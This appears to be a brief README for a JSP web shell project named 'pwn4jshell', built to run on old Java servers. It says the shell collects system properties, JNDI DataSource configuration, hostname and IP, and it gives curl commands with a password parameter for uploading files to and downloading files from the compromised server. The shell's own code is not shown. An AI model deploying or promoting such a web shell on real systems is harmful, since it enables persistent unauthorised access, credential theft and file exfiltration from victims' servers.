Java Web shell project
Idea of creating, webshell with suport to old versions of java. Building it in jsp means the code compilation will happend at the server side with the server compiler, making it easyer and less likely to run into compatibility issues. Other than api... and sintax things should be easy.
Some of the code in this project is based on work from other ppl.
For file upload based on Boris Von Leosch.
Information includes java system properties. Global JNDI Config if specifically if they implement DataSource. Hostname and Ip configuration.
curl -X POST -F "file=@{file to upload}" "http://{ip}:8080/?pass=key&action=up&path={destination}"
if the path is not set the file will be placed in the same dir as the shell.jsp
curl "http://{ip}:8080/pwn4jshell/?pass=key&action=down&path={pathToFile}&args=shell.jsp"
same as upload if path is not set will try to download the file from the same dir as shell.jsp
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